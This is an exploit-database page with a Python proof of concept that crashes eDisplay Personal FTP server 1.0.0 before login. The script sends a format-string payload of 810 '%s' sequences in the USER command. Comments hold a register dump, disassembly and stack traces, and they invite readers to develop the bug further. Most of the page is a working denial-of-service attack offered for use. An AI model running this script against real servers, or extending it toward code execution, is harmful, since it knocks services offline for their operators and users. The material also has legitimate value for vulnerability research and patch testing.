eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS PoC

Exploit Code :

#!/usr/bin/python

#Pre-Authentication crash #1
#I say crash number 1 since there's another instance where it crashes with
the USER command.
#Also many post-authentication commands also crash with the same buffer
type (%n for example)
#with variant degrees of interesting CPU registry overwrites.
#It will crash if you send it about 40 '%s' really, but I've included my
full session of 810 bytes sent.
#As always, if anyone wants to take this further go right ahead. Just be
nice and don't forget who found it.

#CONTEXT DUMP
# EIP: 7e4287aa mov dl,[eax]
# EAX: 73736150 (1936941392) -> N/A
# EBX: 0000000a ( 10) -> N/A
# ECX: 73736150 (1936941392) -> N/A
# EDX: 00000000 ( 0) -> N/A
# EDI: 0012c9a6 ( 1231270) ->
P(9d%s%s%s%s%s%s%s%s%s%s...%s%s%s%s%s%s%s%s%s%:UBsSHs%:vHEs<;T (stack)
# ESI: 73736151 (1936941393) -> N/A
# EBP: 0012c8e4 ( 1231076) -> P 9Hw331 Password required for Pthis control
can act as an OLE drag/drop source,
# and whether this process is started automatically
# or under programmatic
control.P(9d%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s (stack)
# ESP: 0012c89c ( 1231004) -> 9HwC(J :^:{P 9Hw331 Password required for
Pthis control can act as an OLE drag/drop source, and whether this process
is started automatically or under programmatic (stack)
# +00: 0139b8d0 ( 20560080) -> PWSOCK32.DLL (heap)
# +04: 77124880 (1997686912) -> N/A
# +08: 000000cd ( 205) -> N/A
# +0c: 00000000 ( 0) -> N/A
# +10: ffffffff (4294967295) -> N/A
# +14: 00000000 ( 0) -> N/A

#disasm around:
# 0x7e428794 push eax
# 0x7e428795 push byte 0x0
# 0x7e428797 push esi
# 0x7e428798 lea eax,[ebp+0x8]
# 0x7e42879b push eax
# 0x7e42879c call [0x7e4114b8]
# 0x7e4287a2 jmp 0x7e428747
# 0x7e4287a4 test eax,eax
# 0x7e4287a6 jz 0x7e42875e
# 0x7e4287a8 jmp 0x7e428747
# 0x7e4287aa mov dl,[eax]
# 0x7e4287ac inc eax
# 0x7e4287ad test dl,dl
# 0x7e4287af jnz 0x7e4287aa
# 0x7e4287b1 sub eax,esi
# 0x7e4287b3 xor esi,esi
# 0x7e4287b5 xor edx,edx
# 0x7e4287b7 cmp [ebp-0x28],edx
# 0x7e4287ba jnl 0x7e443411
# 0x7e4287c0 sub [ebp-0x18],eax
# 0x7e4287c3 cmp esi,edx

#stack unwind:
# FtpServX.dll:50e0989b
# FtpServX.dll:50e0a6d8
# FtpServX.dll:50e09d91
# USER32.dll:7e418734
# USER32.dll:7e418816
# USER32.dll:7e4189cd
# USER32.dll:7e4196c7
# MSVBVM60.DLL:7342a6b0
# MSVBVM60.DLL:7342a627
# MSVBVM60.DLL:7342a505

#SEH unwind:
# 0012fdf8 -> FtpServX.dll:50e1ceb4 mov eax,0x50e1fcf8
# 0012fe58 -> USER32.dll:7e44048f push ebp
# 0012ffa8 -> USER32.dll:7e44048f push ebp
# 0012ffe0 -> MSVBVM60.DLL:7350bafd push ebp
# ffffffff -> kernel32.dll:7c839ac0 push ebp

import socket

buffer = ("%s") * 810 # \x25\x73

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('xxx.xxx.xxx.xxx',21))
s.recv(1024)
s.send('USER '+buffer+'\r\n')
s.recv(1024)

Security

IT News

Search

SecurityAlert Database

About SecurityAlert

ExploitAlert Database

SecurityReason Research

WLB Database

Send to WLB

About WLB

Security Audit

Schedule

Prices of services

Contact

SecurityReason IT News

SecurityAlert

World Laboratory of Bugtraq

ExploitAlert

Apache

PHP

Contact

About SecurityReason